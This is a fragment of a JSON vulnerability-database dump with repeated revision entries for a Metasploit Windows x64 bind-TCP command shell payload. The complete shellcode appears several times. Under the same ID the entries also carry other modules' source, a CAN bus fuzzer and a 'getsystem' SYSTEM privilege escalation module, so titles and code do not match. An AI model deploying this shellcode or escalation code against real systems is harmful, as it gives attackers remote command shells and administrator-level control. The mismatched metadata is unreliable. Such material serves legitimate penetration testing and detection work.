\"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-06T15:50:16", "differentElements": ["published", "sourceData", "sourceHref"], "edition": 25}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "5c566c5ba4990e91f4c8e9cb366d7fbe", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2017-05-02T21:19:29", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-17T08:25:35", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 4.1, "vector": "NONE", "modified": "2019-10-17T08:25:35"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1769715006679995681", "KITPLOIT:3279952724098873222", "KITPLOIT:6910250162001955125"]}, {"type": "cve", "idList": ["CVE-2019-17435"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33"]}, {"type": "exploitdb", "idList": ["EDB-ID:47504", "EDB-ID:47505", "EDB-ID:47506", "EDB-ID:47508", "EDB-ID:47510", "EDB-ID:47512"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154874", "PACKETSTORM:154881", "PACKETSTORM:154880", "PACKETSTORM:154866", "PACKETSTORM:154872", "PACKETSTORM:154878"]}, {"type": "threatpost", "idList": ["THREATPOST:8EB884B880A80E689744A516A7A41E38"]}, {"type": "mskb", "idList": ["KB4511553", "KB4507435"]}], "modified": "2019-10-17T08:25:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/hardware/automotive/canprobe.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Module to Probe Different Data Points in a CAN Packet',\n 'Description' => %q{\n Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). Does not check for responses and is\n basically a simple blind fuzzer.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Craig Smith'],\n 'Platform' => ['hardware'],\n 'SessionTypes' => ['hwbridge']\n ))\n register_options([\n OptInt.new('STARTID', [false, \"CAN ID to start scan\", 0x300]),\n OptInt.new('STOPID', [false, \"CAN ID to stop scan\", nil]),\n OptInt.new('PROBEVALUE', [false, \"Value to inject in the data stream\", 0xFF]),\n OptInt.new('PADDING', [false, \"If a value is given a full 8 bytes will be used and padded with this value\", nil]),\n OptBool.new('FUZZ', [false, \"If true interates through all possible values for each data position\", false]),\n OptString.new('CANBUS', [false, \"CAN Bus to perform scan on, defaults to connected bus\", nil])\n ])\n end\n\n def run\n unless client.automotive\n print_error(\"The hwbridge requires a functional automotive extention\")\n return\n end\n stopid = datastore['STARTID']\n stopid = datastore['STOPID'] unless datastore['STOPID'].nil?\n data = \"%02X\" % datastore['PROBEVALUE']\n (datastore['STARTID']..stopid).each do |id|\n print_status(\"Probing 0x#{id.to_s(16)}...\")\n (0..7).each do |pos|\n padding = \"00\" * pos\n endpadding = \"\"\n endpadding = (\"%02X\" % datastore['PADDING']) * (7-pos) if not datastore['PADDING'].nil?\n if datastore['FUZZ'] then\n (0..255).each do |fuzzdata|\n client.automotive.cansend(datastore['CANBUS'], id.to_s(16), padding + (\"%02X\" % fuzzdata) + endpadding)\n end\n else\n client.automotive.cansend(datastore['CANBUS'], id.to_s(16), padding + data + endpadding)\n end\n end\n end\n print_status(\"Probe Complete\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-17T08:25:35", "differentElements": ["published", "sourceData", "sourceHref"], "edition": 26}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-17T10:31:57", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 4.2, "vector": "NONE", "modified": "2019-10-17T10:31:57"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1769715006679995681", "KITPLOIT:3279952724098873222", "KITPLOIT:6910250162001955125"]}, {"type": "cve", "idList": ["CVE-2019-17435"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33"]}, {"type": "exploitdb", "idList": ["EDB-ID:47504", "EDB-ID:47505", "EDB-ID:47508", "EDB-ID:47506", "EDB-ID:47510", "EDB-ID:47512"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154874", "PACKETSTORM:154881", "PACKETSTORM:154866", "PACKETSTORM:154872", "PACKETSTORM:154880", "PACKETSTORM:154878"]}, {"type": "threatpost", "idList": ["THREATPOST:8EB884B880A80E689744A516A7A41E38"]}, {"type": "mskb", "idList": ["KB4511553", "KB4507435"]}], "modified": "2019-10-17T10:31:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-17T10:31:57", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 27}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "bc8ae5c8208a5954911baf3f260eec9e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Escalate Get System via Administrator", "description": "This module uses the builtin 'getsystem' command to escalate the current session to the SYSTEM account from an administrator user account.\n", "published": "2011-11-11T22:19:49", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-02T01:49:28", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 2.8, "vector": "NONE", "modified": "2019-11-02T01:49:28"}, "dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA"]}, {"type": "threatpost", "idList": ["THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:2769E144F2303BBED3E2EAD715080C55"]}, {"type": "thn", "idList": ["THN:9C73175440CD28F1BCB5707C48282690"]}, {"type": "exploitdb", "idList": ["EDB-ID:47573", "EDB-ID:47570", "EDB-ID:47571", "EDB-ID:47568"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155056", "PACKETSTORM:155060", "PACKETSTORM:155039", "PACKETSTORM:155045"]}, {"type": "kitploit", "idList": ["KITPLOIT:7173504249684290798", "KITPLOIT:4742624487804407034"]}, {"type": "cve", "idList": ["CVE-2019-18368"]}, {"type": "mskb", "idList": ["KB4462242"]}, {"type": "symantec", "idList": ["SMNTC-110664", "SMNTC-110677"]}], "modified": "2019-11-02T01:49:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/escalate/getsystem.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasm'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Priv\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Escalate Get System via Administrator',\n 'Description' => %q{\n This module uses the builtin 'getsystem' command to escalate\n the current session to the SYSTEM account from an administrator\n user account.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'hdm',\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options([\n OptInt.new('TECHNIQUE', [false, \"Specify a particular technique to use (1-4), otherwise try them all\", 0])\n ])\n\n end\n\n def unsupported\n print_error(\"This platform is not supported with this script!\")\n raise Rex::Script::Completed\n end\n\n def run\n\n technique = datastore['TECHNIQUE'].to_i\n\n unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)\n\n if is_system?\n print_good(\"This session already has SYSTEM privileges\")\n return\n end\n\n begin\n result = client.priv.getsystem(technique)\n print_good(\"Obtained SYSTEM via technique #{result[1]}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Failed to obtain SYSTEM access\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-02T01:49:28", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 28}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-02T05:06:07", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 2.8, "vector": "NONE", "modified": "2019-11-02T05:06:07"}, "dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA"]}, {"type": "threatpost", "idList": ["THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:2769E144F2303BBED3E2EAD715080C55"]}, {"type": "thn", "idList": ["THN:9C73175440CD28F1BCB5707C48282690"]}, {"type": "exploitdb", "idList": ["EDB-ID:47573", "EDB-ID:47570", "EDB-ID:47571", "EDB-ID:47568"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155056", "PACKETSTORM:155060", "PACKETSTORM:155039", "PACKETSTORM:155045"]}, {"type": "kitploit", "idList": ["KITPLOIT:7173504249684290798", "KITPLOIT:4742624487804407034"]}, {"type": "cve", "idList": ["CVE-2019-18368"]}, {"type": "mskb", "idList": ["KB4462242"]}, {"type": "symantec", "idList": ["SMNTC-110664", "SMNTC-110677"]}], "modified": "2019-11-02T05:06:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-02T05:06:07", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "a0ea5006b4a05e9a83a6a2eef229a354", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-06T08:38:56", "history": [], "viewCount": 25, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2019-11-06T08:38:56"}, "dependencies": {"references": [{"type": "mssecure", "idList": ["MSSECURE:8FCF4524349D245E482CA41E05D49374"]}, {"type": "kitploit", "idList": ["KITPLOIT:7323577050718865961"]}, {"type": "thn", "idList": ["THN:960DCF51C9F65091A09F7C0AD2BAFDB4"]}, {"type": "securelist", "idList": ["SECURELIST:A9B8DE2088B27BD39ECB584643D2E9C2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A175FE0E2B98D95C6789EC72C4AC3EE9", "TALOSBLOG:148BAB0DA5CB7C56251F6708A1BB6CE1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3BE55E98005A88BB4C515B494707B549"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155102", "PACKETSTORM:155111", "PACKETSTORM:155104"]}, {"type": "nessus", "idList": ["UBUNTU_USN-4170-3.NASL"]}, {"type": "talos", "idList": ["TALOS-2019-0876", "TALOS-2019-0891", "TALOS-2019-0916", "TALOS-2019-0892"]}, {"type": "exploitdb", "idList": ["EDB-ID:47584", "EDB-ID:47582", "EDB-ID:47586"]}, {"type": "ics", "idList": ["ICSA-19-134-01"]}, {"type": "ubuntu", "idList": ["USN-4170-3"]}], "modified": "2019-11-06T08:38:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n 